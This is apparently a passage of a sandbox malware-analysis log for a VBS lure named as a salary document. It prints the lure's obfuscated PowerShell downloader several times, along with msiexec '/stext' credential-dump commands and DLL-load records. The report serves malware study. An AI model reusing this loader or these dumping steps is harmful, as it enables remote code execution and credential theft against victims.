              Source: msiexec.exe, 0000000B.00000003.1810781718.0000000004990000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 0000000B.00000003.1810663842.0000000004990000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 0000000B.00000002.1812069255.0000000004990000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 0000000B.00000003.1810715475.0000000004990000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 0000000B.00000003.1810925816.0000000004990000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
              Source: msiexec.exe, msiexec.exe, 0000000B.00000002.1811172358.0000000000400000.00000040.80000000.00040000.00000000.sdmpBinary or memory string: SELECT 'DELETE FROM vacuum_db.' || quote(name) || ';' FROM vacuum_db.sqlite_master WHERE name='sqlite_sequence'
              Source: Salary Revision_pdf.vbsReversingLabs: Detection: 13%
              Source: C:\Windows\SysWOW64\msiexec.exeEvasive API call chain: __getmainargs,DecisionNodes,exitgraph_12-33237
              Source: unknownProcess created: C:\Windows\System32\wscript.exe C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\Salary Revision_pdf.vbs"
              Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" " <#Rastafarian Reservoiret spermatophobia Zwitterions Nonevading Paragraferes #>;$Forjttelserne='Horsehair';<#humeral Grainier Embathe Agaty #>;$Maksimale188=$Genanvendelsesprocessernconsumably+$host.UI; function Adiabaticlly($Megafonens){If ($Maksimale188) {$Mahajan++;}$Minim=$Genanvendelsesprocesserntolerability+$Megafonens.'Length'-$Mahajan; for( $Genanvendelsesprocesser=3;$Genanvendelsesprocesser -lt $Minim;$Genanvendelsesprocesser+=4){$Farings=$Genanvendelsesprocesser;$alma+=$Megafonens[$Genanvendelsesprocesser];$Erantissenes='Nemhed';}$alma;}function Vandende($Feriers){ .($Bibliografisk) ($Feriers);}$Mealymouthedness=Adiabaticlly 'In MslioRebzVani ndlPyrlfulaEni/sco ';$Mealymouthedness+=Adiabaticlly 'Fli5Udk.Con0nel stu(DevWB gi den RodskroAmpw Tos Po Re NTilTuge I l1 Li0.ha. La0 ,i;Ann DryWTi iB.onUnd6Ham4Aff;Oxy satxUnd6 Gi4Ung;Dam MisrDiavsva:The1Tia3,ou1Inf.til0T t)Ma. BhiGsidesamcRefk FioFa,/ Vi2 Ge0For1s,o0Fll0 pe1oft0 b1 i steF oiCherstieshafTv.oFlyx .t/Cen1 B 3 Co1s m.T.l0Uds ';$Verdeners=Adiabaticlly 'se u ass B ETi,r an-JunAForG EveTrsNDepT To ';$Belard=Adiabaticlly ' UdhNint A.tLi pIdis o:st /Alg/UndsovefWor4 O l sp.JacsserhBaaoIngpBr./ Muz brWDy AB lb P,mF drUd,m TuPInd/ KoDi fiCyswKria ,rnB siGe,.sacpBeif DabUdt ';$Preindisposition=Adiabaticlly 'P,e>neu ';$Bibliografisk=Adiabaticlly 'C iI .neAurxVel ';$Formaalene='Celiectomy';$Ujordiskes='\Taxlessly199.Cho';Vandende (Adiabaticlly 'Alp$bragHiel llo H bsidAMyclopl:PerRE eeselfjanrlucAUn CArstParOFo MWh eGenT,asrBulYHs 1Pos8 Un8,ne= No$ enEUnvNcriVOm : ffAEkiP Php odMetAs iTDisA la+sy $ U UCatjJouOG,irFordOveiNedsWrykKeeeFedssmi ');Vandende (Adiabaticlly ' H $ rGs,il svO onBTilA .aLA.d:.haFOrdO,lerRbes Ork dn Kvi,ngNansGOpksA tROxfEskos DaudorLa.kt nta titBoue FyrudksDel=Try$ .nbF rERholeddADirr,andHol.sursPo pGulL ori Ent pe(T n$ Exp eR.rne .tI UnNsepD liI LesTr.p fsosynsTo iLiktHosiKl,oTrinsv )Dul ');Vandende (Adiabaticlly 'Gen[KluNLileswaTI s. nsF oeimpRshaV oITrfCHaneC,up EpOAt IsigNKurT seMYasA roN T asilGValesilRgra]Fus:Fam:Ab srepEKa,cstaukn RInoIzootLudYPatpstoRps.O FrTDeaOZencsoloGr LDre Evi=s b Utu[.urnFodeDantsan.Lumss ae seCUriuspar R IUnjT dyKdep,dorPaaoLiltUnco,ubc saOFaclR,gt nyAnkpskuEAfs]Erk:Abo:D atsk lGurssty1Ran2sle ');$Belard=$Forskningsresultaters[0];$Estimeringens=(Adiabaticlly '.nd$ BagD sLsanoskrbAntaextlTol:sknMIndaEl UB rNAleD xpEHo,RVej=CornRemEVecwBu - AkoIntB InjTaneskic eatRep Hiss OpyLn sUnrTrefeattmodo.UndnBese Aft Er. enwForEUngB omcs,uLUnciVu EDolnModTGen ');Vandende ($Estimeringens);Vandende (Adiabaticlly 'Zak$UsaManraFodu FonIm,dIl eForrInd.vaaHF.oe llaTild unesymrbeestyr[ .t$ haV meO trTrad nesa n ape LerOffsRec]K r=Har$InsM sse raBanlregy l mInjo spu latMish AreGa dF unDele Gjs Bas ,h ');$Oxyhematin=Adiabaticlly 'Ava$UnoMBluaevnu pn FudFeleForrT n. unDstyoBrnw,izn sklU,wovkka HydChoF.rviba.lskaeRig(she$VejBUnq
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
              Source: unknownProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" " <#Rastafarian Reservoiret spermatophobia Zwitterions Nonevading Paragraferes #>;$Forjttelserne='Horsehair';<#humeral Grainier Embathe Agaty #>;$Maksimale188=$Genanvendelsesprocessernconsumably+$host.UI; function Adiabaticlly($Megafonens){If ($Maksimale188) {$Mahajan++;}$Minim=$Genanvendelsesprocesserntolerability+$Megafonens.'Length'-$Mahajan; for( $Genanvendelsesprocesser=3;$Genanvendelsesprocesser -lt $Minim;$Genanvendelsesprocesser+=4){$Farings=$Genanvendelsesprocesser;$alma+=$Megafonens[$Genanvendelsesprocesser];$Erantissenes='Nemhed';}$alma;}function Vandende($Feriers){ .($Bibliografisk) ($Feriers);}$Mealymouthedness=Adiabaticlly 'In MslioRebzVani ndlPyrlfulaEni/sco ';$Mealymouthedness+=Adiabaticlly 'Fli5Udk.Con0nel stu(DevWB gi den RodskroAmpw Tos Po Re NTilTuge I l1 Li0.ha. La0 ,i;Ann DryWTi iB.onUnd6Ham4Aff;Oxy satxUnd6 Gi4Ung;Dam MisrDiavsva:The1Tia3,ou1Inf.til0T t)Ma. BhiGsidesamcRefk FioFa,/ Vi2 Ge0For1s,o0Fll0 pe1oft0 b1 i steF oiCherstieshafTv.oFlyx .t/Cen1 B 3 Co1s m.T.l0Uds ';$Verdeners=Adiabaticlly 'se u ass B ETi,r an-JunAForG EveTrsNDepT To ';$Belard=Adiabaticlly ' UdhNint A.tLi pIdis o:st /Alg/UndsovefWor4 O l sp.JacsserhBaaoIngpBr./ Muz brWDy AB lb P,mF drUd,m TuPInd/ KoDi fiCyswKria ,rnB siGe,.sacpBeif DabUdt ';$Preindisposition=Adiabaticlly 'P,e>neu ';$Bibliografisk=Adiabaticlly 'C iI .neAurxVel ';$Formaalene='Celiectomy';$Ujordiskes='\Taxlessly199.Cho';Vandende (Adiabaticlly 'Alp$bragHiel llo H bsidAMyclopl:PerRE eeselfjanrlucAUn CArstParOFo MWh eGenT,asrBulYHs 1Pos8 Un8,ne= No$ enEUnvNcriVOm : ffAEkiP Php odMetAs iTDisA la+sy $ U UCatjJouOG,irFordOveiNedsWrykKeeeFedssmi ');Vandende (Adiabaticlly ' H $ rGs,il svO onBTilA .aLA.d:.haFOrdO,lerRbes Ork dn Kvi,ngNansGOpksA tROxfEskos DaudorLa.kt nta titBoue FyrudksDel=Try$ .nbF rERholeddADirr,andHol.sursPo pGulL ori Ent pe(T n$ Exp eR.rne .tI UnNsepD liI LesTr.p fsosynsTo iLiktHosiKl,oTrinsv )Dul ');Vandende (Adiabaticlly 'Gen[KluNLileswaTI s. nsF oeimpRshaV oITrfCHaneC,up EpOAt IsigNKurT seMYasA roN T asilGValesilRgra]Fus:Fam:Ab srepEKa,cstaukn RInoIzootLudYPatpstoRps.O FrTDeaOZencsoloGr LDre Evi=s b Utu[.urnFodeDantsan.Lumss ae seCUriuspar R IUnjT dyKdep,dorPaaoLiltUnco,ubc saOFaclR,gt nyAnkpskuEAfs]Erk:Abo:D atsk lGurssty1Ran2sle ');$Belard=$Forskningsresultaters[0];$Estimeringens=(Adiabaticlly '.nd$ BagD sLsanoskrbAntaextlTol:sknMIndaEl UB rNAleD xpEHo,RVej=CornRemEVecwBu - AkoIntB InjTaneskic eatRep Hiss OpyLn sUnrTrefeattmodo.UndnBese Aft Er. enwForEUngB omcs,uLUnciVu EDolnModTGen ');Vandende ($Estimeringens);Vandende (Adiabaticlly 'Zak$UsaManraFodu FonIm,dIl eForrInd.vaaHF.oe llaTild unesymrbeestyr[ .t$ haV meO trTrad nesa n ape LerOffsRec]K r=Har$InsM sse raBanlregy l mInjo spu latMish AreGa dF unDele Gjs Bas ,h ');$Oxyhematin=Adiabaticlly 'Ava$UnoMBluaevnu pn FudFeleForrT n. unDstyoBrnw,izn sklU,wovkka HydChoF.rviba.lskaeRig(she$VejBUnq
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\msiexec.exe "C:\Windows\SysWOW64\msiexec.exe"
              Source: C:\Windows\SysWOW64\msiexec.exeProcess created: C:\Windows\SysWOW64\msiexec.exe C:\Windows\System32\msiexec.exe /stext "C:\Users\user\AppData\Local\Temp\kfiuinmpbcvzn"
              Source: C:\Windows\SysWOW64\msiexec.exeProcess created: C:\Windows\SysWOW64\msiexec.exe C:\Windows\System32\msiexec.exe /stext "C:\Users\user\AppData\Local\Temp\kfiuinmpbcvzn"
              Source: C:\Windows\SysWOW64\msiexec.exeProcess created: C:\Windows\SysWOW64\msiexec.exe C:\Windows\System32\msiexec.exe /stext "C:\Users\user\AppData\Local\Temp\vzonifxrpknexemx"
              Source: C:\Windows\SysWOW64\msiexec.exeProcess created: C:\Windows\SysWOW64\msiexec.exe C:\Windows\System32\msiexec.exe /stext "C:\Users\user\AppData\Local\Temp\xbbfjqhklsfrakibsnra"
              Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" " <#Rastafarian Reservoiret spermatophobia Zwitterions Nonevading Paragraferes #>;$Forjttelserne='Horsehair';<#humeral Grainier Embathe Agaty #>;$Maksimale188=$Genanvendelsesprocessernconsumably+$host.UI; function Adiabaticlly($Megafonens){If ($Maksimale188) {$Mahajan++;}$Minim=$Genanvendelsesprocesserntolerability+$Megafonens.'Length'-$Mahajan; for( $Genanvendelsesprocesser=3;$Genanvendelsesprocesser -lt $Minim;$Genanvendelsesprocesser+=4){$Farings=$Genanvendelsesprocesser;$alma+=$Megafonens[$Genanvendelsesprocesser];$Erantissenes='Nemhed';}$alma;}function Vandende($Feriers){ .($Bibliografisk) ($Feriers);}$Mealymouthedness=Adiabaticlly 'In MslioRebzVani ndlPyrlfulaEni/sco ';$Mealymouthedness+=Adiabaticlly 'Fli5Udk.Con0nel stu(DevWB gi den RodskroAmpw Tos Po Re NTilTuge I l1 Li0.ha. La0 ,i;Ann DryWTi iB.onUnd6Ham4Aff;Oxy satxUnd6 Gi4Ung;Dam MisrDiavsva:The1Tia3,ou1Inf.til0T t)Ma. BhiGsidesamcRefk FioFa,/ Vi2 Ge0For1s,o0Fll0 pe1oft0 b1 i steF oiCherstieshafTv.oFlyx .t/Cen1 B 3 Co1s m.T.l0Uds ';$Verdeners=Adiabaticlly 'se u ass B ETi,r an-JunAForG EveTrsNDepT To ';$Belard=Adiabaticlly ' UdhNint A.tLi pIdis o:st /Alg/UndsovefWor4 O l sp.JacsserhBaaoIngpBr./ Muz brWDy AB lb P,mF drUd,m TuPInd/ KoDi fiCyswKria ,rnB siGe,.sacpBeif DabUdt ';$Preindisposition=Adiabaticlly 'P,e>neu ';$Bibliografisk=Adiabaticlly 'C iI .neAurxVel ';$Formaalene='Celiectomy';$Ujordiskes='\Taxlessly199.Cho';Vandende (Adiabaticlly 'Alp$bragHiel llo H bsidAMyclopl:PerRE eeselfjanrlucAUn CArstParOFo MWh eGenT,asrBulYHs 1Pos8 Un8,ne= No$ enEUnvNcriVOm : ffAEkiP Php odMetAs iTDisA la+sy $ U UCatjJouOG,irFordOveiNedsWrykKeeeFedssmi ');Vandende (Adiabaticlly ' H $ rGs,il svO onBTilA .aLA.d:.haFOrdO,lerRbes Ork dn Kvi,ngNansGOpksA tROxfEskos DaudorLa.kt nta titBoue FyrudksDel=Try$ .nbF rERholeddADirr,andHol.sursPo pGulL ori Ent pe(T n$ Exp eR.rne .tI UnNsepD liI LesTr.p fsosynsTo iLiktHosiKl,oTrinsv )Dul ');Vandende (Adiabaticlly 'Gen[KluNLileswaTI s. nsF oeimpRshaV oITrfCHaneC,up EpOAt IsigNKurT seMYasA roN T asilGValesilRgra]Fus:Fam:Ab srepEKa,cstaukn RInoIzootLudYPatpstoRps.O FrTDeaOZencsoloGr LDre Evi=s b Utu[.urnFodeDantsan.Lumss ae seCUriuspar R IUnjT dyKdep,dorPaaoLiltUnco,ubc saOFaclR,gt nyAnkpskuEAfs]Erk:Abo:D atsk lGurssty1Ran2sle ');$Belard=$Forskningsresultaters[0];$Estimeringens=(Adiabaticlly '.nd$ BagD sLsanoskrbAntaextlTol:sknMIndaEl UB rNAleD xpEHo,RVej=CornRemEVecwBu - AkoIntB InjTaneskic eatRep Hiss OpyLn sUnrTrefeattmodo.UndnBese Aft Er. enwForEUngB omcs,uLUnciVu EDolnModTGen ');Vandende ($Estimeringens);Vandende (Adiabaticlly 'Zak$UsaManraFodu FonIm,dIl eForrInd.vaaHF.oe llaTild unesymrbeestyr[ .t$ haV meO trTrad nesa n ape LerOffsRec]K r=Har$InsM sse raBanlregy l mInjo spu latMish AreGa dF unDele Gjs Bas ,h ');$Oxyhematin=Adiabaticlly 'Ava$UnoMBluaevnu pn FudFeleForrT n. unDstyoBrnw,izn sklU,wovkka HydChoF.rviba.lskaeRig(she$VejBUnqJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\msiexec.exe "C:\Windows\SysWOW64\msiexec.exe"Jump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeProcess created: C:\Windows\SysWOW64\msiexec.exe C:\Windows\System32\msiexec.exe /stext "C:\Users\user\AppData\Local\Temp\kfiuinmpbcvzn"Jump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeProcess created: C:\Windows\SysWOW64\msiexec.exe C:\Windows\System32\msiexec.exe /stext "C:\Users\user\AppData\Local\Temp\kfiuinmpbcvzn"Jump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeProcess created: C:\Windows\SysWOW64\msiexec.exe C:\Windows\System32\msiexec.exe /stext "C:\Users\user\AppData\Local\Temp\vzonifxrpknexemx"Jump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeProcess created: C:\Windows\SysWOW64\msiexec.exe C:\Windows\System32\msiexec.exe /stext "C:\Users\user\AppData\Local\Temp\xbbfjqhklsfrakibsnra"Jump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: version.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: kernel.appcore.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: uxtheme.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: sxs.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: vbscript.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: userenv.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: profapi.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: wldp.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: msasn1.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: cryptsp.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: rsaenh.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: cryptbase.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: msisip.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: wshext.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: scrobj.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: gpapi.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: cryptnet.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: iphlpapi.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: winnsi.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: winhttp.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: mswsock.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: dhcpcsvc6.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: dhcpcsvc.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: webio.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: sspicli.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: dnsapi.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: rasadhlp.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: fwpuclnt.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: cabinet.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: scrrun.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: wbemcomn.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: propsys.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: windows.storage.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: edputil.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: urlmon.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: iertutil.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: srvcli.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: netutils.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: windows.staterepositoryps.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: wintypes.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: appresolver.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: bcp47langs.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: slc.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: sppc.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: onecorecommonproxystub.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: pcacli.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: mpr.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: sfc_os.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasapi32.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasman.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rtutils.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mswsock.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: winhttp.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iphlpapi.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dhcpcsvc6.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dhcpcsvc.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dnsapi.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: winnsi.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasadhlp.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: fwpuclnt.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: schannel.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mskeyprotect.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ntasn1.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ncrypt.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ncryptsslp.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: napinsp.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: pnrpnsp.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshbth.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: nlaapi.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: winrnr.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sxs.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: napinsp.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: pnrpnsp.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshbth.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: nlaapi.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: iphlpapi.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mswsock.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: dnsapi.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: winrnr.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: fwpuclnt.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasadhlp.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: apphelp.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: apphelp.dllJump to behavior
